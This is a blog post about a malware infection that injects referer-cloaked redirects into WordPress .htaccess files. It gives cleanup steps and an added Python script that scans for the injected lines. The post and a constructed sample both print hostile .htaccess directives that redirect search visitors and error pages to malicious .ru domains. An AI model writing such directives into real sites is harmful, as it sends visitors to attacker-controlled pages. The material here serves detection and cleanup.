WordPress Malware?

There is an interesting piece of malware going around in the last couple of weeks. It appears to be a MySQL injection that can infiltrate .htaccess files not only on a WordPress install but on any other 3rd party software you may have on your server. On some servers it can be hard to detect, so keep an eye out for slow-loading pages and watch the status bar: you will see it try to redirect you to http://bannortim-qimulta.ru/industry/index.php

It adds a lot of redirects to your .htaccess; they look like this.

———————–
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|f…..

and then some.

You also have to check the end of the file, as it adds blank lines and then starts again with more malware redirects.

ErrorDocument 400 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 401 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 403 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 404 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 500 http://qimulta-bannortim.ru/upday/index.php

———————-

If you remove this from your .htaccess it will often reappear.

Recommendation:

  • Remove your MySQL user that is connected to your database
  • Put your site offline, and start looking at your database in PHPMyAdmin for malicious code to remove.
  • Create a new MySQL user and rename your database.
  • Update your WordPress install and your plugins/themes. Research your plugins/themes for known attacks.
  • Check your .htaccess file – remove hack redirects.
  • Check above your public_html directory (home directory) as it can put an .htaccess file there too.
  • Check with your host for a solution if you have a good one. We use SimpleHelix and have had good luck and good support.
  • If all else fails, export your posts and pages and reinstall WordPress with the latest updates and the latest theme and plugin updates.
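The two .htaccess checks in the list above (your site's file and the one the malware may drop in the home directory above public_html) can be scripted. This is an added example, not code from the post; it assumes Python 3 and read access to the directories you point it at, and the sample .htaccess is constructed from the fragments quoted above.

```python
import re
from pathlib import Path

# Constructed sample of an infected .htaccess, modelled on the fragments quoted
# in the post (same domain); the first block is a normal WordPress stanza.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteRule ^index\\.php$ - [L]
ErrorDocument 404 /404.html
# END WordPress

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|bing|facebook|twitter).*$ [NC]
RewriteRule ^(.*)$ http://qimulta-bannortim.ru/upday/index.php [R=301,L]
ErrorDocument 400 http://qimulta-bannortim.ru/upday/index.php
ErrorDocument 404 http://qimulta-bannortim.ru/upday/index.php
"""

# Legitimate ErrorDocument targets are local paths or quoted text; the
# injected ones point at an absolute http(s) URL on another host.
EXTERNAL_ERRORDOC = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+https?://', re.I)
# A referer condition listing search engines is the cloaking trick: only
# visitors arriving from search get redirected, so the owner sees nothing.
SEARCH_REFERER_COND = re.compile(
    r'^\s*RewriteCond\s+%\{HTTP_REFERER\}.*\b(google|yahoo|bing|yandex|facebook)\b', re.I)
# A RewriteRule whose substitution is an absolute URL sends visitors off-site.
EXTERNAL_REWRITE = re.compile(r'^\s*RewriteRule\s+\S+\s+https?://', re.I)

def scan_htaccess_text(text):
    """Return (line_no, reason, line) for every suspicious directive."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if EXTERNAL_ERRORDOC.search(line):
            findings.append((n, "ErrorDocument points to external URL", line.strip()))
        elif SEARCH_REFERER_COND.search(line):
            findings.append((n, "referer-cloaking RewriteCond", line.strip()))
        elif EXTERNAL_REWRITE.search(line):
            findings.append((n, "RewriteRule redirects off-site", line.strip()))
    return findings

def scan_tree(root):
    """Scan every .htaccess under root (start at the home directory, one level
    above public_html, as the post advises) and return {path: findings}."""
    hits = {}
    for path in Path(root).rglob(".htaccess"):
        found = scan_htaccess_text(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits
```

Run `scan_tree("/home/youruser")` on the server and review each hit by hand before deleting anything, since a legitimate off-site ErrorDocument is rare but possible.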

It looks like the cause is an outdated WordPress install or outdated plugins/themes, so some of these sites might help you figure it out.

http://wordpress.org/support/topic/i-have-been-well-and-truly-hacked
http://wordpress.org/support/topic/was-our-website-hacked-please-help
http://sucuri.net/global
http://www.google.co.uk/support/forum/p/Webmasters/thread?tid=4c051eb8c6e2e972&hl=en